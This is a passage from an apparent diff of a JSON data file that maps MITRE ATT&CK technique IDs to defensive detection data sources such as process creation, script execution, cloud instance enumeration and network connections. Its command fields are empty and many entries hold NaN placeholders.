application log.", + "source_data_element": "application log", + "relationship": "contained", + "target_data_element": "application event entries" + } + ], + "external_reference": [ + [ + "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + ] + ] + }, + { + "technique_id": "T1593.002", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1593.001", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1593", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1592.004", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1592.003", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1592.002", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1592.001", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1592", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1591.004", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1591.003", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1591.001", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1591.002", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1591", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1590.006", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1590.005", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1590.004", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1590.003", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1590.002", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1590.001", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1590", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1589.003", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1589.002", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1589.001", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1589", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1588.005", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1588.004", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1588.003", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1588.002", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1588.001", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1588", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1587.004", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1587.003", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1587.002", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1587.001", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1587", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1586.002", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1586.001", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1586", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1585.002", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1585.001", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1585", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1584.006", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1584.005", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1584.004", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1584.003", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1584.002", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1584.001", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1583.006", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1583.005", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1583.004", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1583.003", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1583.002", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1584", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1583.001", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1583", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1564.007", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "script", + "definition": "Information about executable script content, such as data provided by PowerShell logs and/or AMSI", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "script execution", + "description": "Data and information that describe contents of an execution script", + "source_data_element": "command", + "relationship": "executed", + "target_data_element": "script" + }, + { + "data_source": "script", + "definition": "Information about executable script content, such as data provided by PowerShell logs and/or AMSI", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "script execution", + "description": "Data and information that describe contents of an execution script", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "script" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file content", + "description": "Data contained in a file.", + "source_data_element": "process", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file content", + "description": "Data contained in a file.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_logging_windows?view=powershell-7", + "https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html", + "https://docs.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1580", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "instance", + "definition": "Information about a virtual system within a cloud environment.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "instance metadata", + "description": "Data and information that describe an instance and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "instance" + }, + { + "data_source": "instance", + "definition": "Information about a virtual system within a cloud environment.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "instance enumeration", + "description": "Instances were listed.", + "source_data_element": "user", + "relationship": "listed", + "target_data_element": "instances" + }, + { + "data_source": "instance", + "definition": "Information about a virtual system within a cloud environment.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "instance enumeration", + "description": "Instances were listed.", + "source_data_element": "user", + "relationship": "described", + "target_data_element": "instances" + }, + { + "data_source": "instance", + "definition": "Information about a virtual system within a cloud environment.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "instance enumeration", + "description": "Instances were listed.", + "source_data_element": "user", + "relationship": "viewed", + "target_data_element": "instance" + }, + { + "data_source": "snapshot", + "definition": "Information associated with the state of a system at a particular point in time.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "snapshot metadata", + "description": "Data and information that describe a snapshot and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "snapshot" + }, + { + "data_source": "snapshot", + "definition": "Information associated with the state of a system at a particular point in time.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "snapshot enumeration", + "description": "A snapshot was listed.", + "source_data_element": "user", + "relationship": "listed", + "target_data_element": "snapshot" + }, + { + "data_source": "cloud storage", + "definition": "Information associated with data object storage provided by a cloud vendor.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "cloud storage metadata", + "description": "Data and information that describe a cloud storage and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "cloud storage" + }, + { + "data_source": "cloud storage", + "definition": "Information associated with data object storage provided by a cloud vendor.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "cloud storage enumeration", + "description": "A cloud storage was listed.", + "source_data_element": "user", + "relationship": "listed", + "target_data_element": "cloud storage buckets" + }, + { + "data_source": "cloud storage", + "definition": "Information associated with data object storage provided by a cloud vendor.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "cloud storage enumeration", + "description": "A cloud storage was listed.", + "source_data_element": "user", + "relationship": "listed", + "target_data_element": "cloud storage objects" + }, + { + "data_source": "volume", + "definition": "Information associated with accessible storage areas with a single file system.", + "collection_layers": [ + "cloud", + "host" + ], + "data_source_platform": [ + "IaaS", + "Windows", + "Linux", + "macOS" + ], + "data_component": "volume metadata", + "description": "Data and information that describe a volume and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "volume" + }, + { + "data_source": "volume", + "definition": "Information associated with accessible storage areas with a single file system.", + "collection_layers": [ + "cloud", + "host" + ], + "data_source_platform": [ + "IaaS", + "Windows", + "Linux", + "macOS" + ], + "data_component": "volume enumeration", + "description": "A volume was listed.", + "source_data_element": "user", + "relationship": "listed", + "target_data_element": "volume" + } + ], + "external_reference": [ + [ + "https://aws.amazon.com/ec2/?ec2-whats-new.sort-by=item.additionalFields.postDateTime&ec2-whats-new.sort-order=desc", + "https://azure.microsoft.com/en-us/overview/what-is-a-virtual-machine/", + "https://cloud.google.com/compute/docs/instances" + ], + [ + "https://docs.microsoft.com/en-us/azure/virtual-machines/linux/snapshot-copy-managed-disk", + "https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/EBSSnapshots.html" + ], + [ + "https://aws.amazon.com/s3/", + "https://azure.microsoft.com/en-us/services/storage/blobs/", + "https://cloud.google.com/storage" + ] + ] + }, + { + "technique_id": "T1218.012", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1205.001", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as 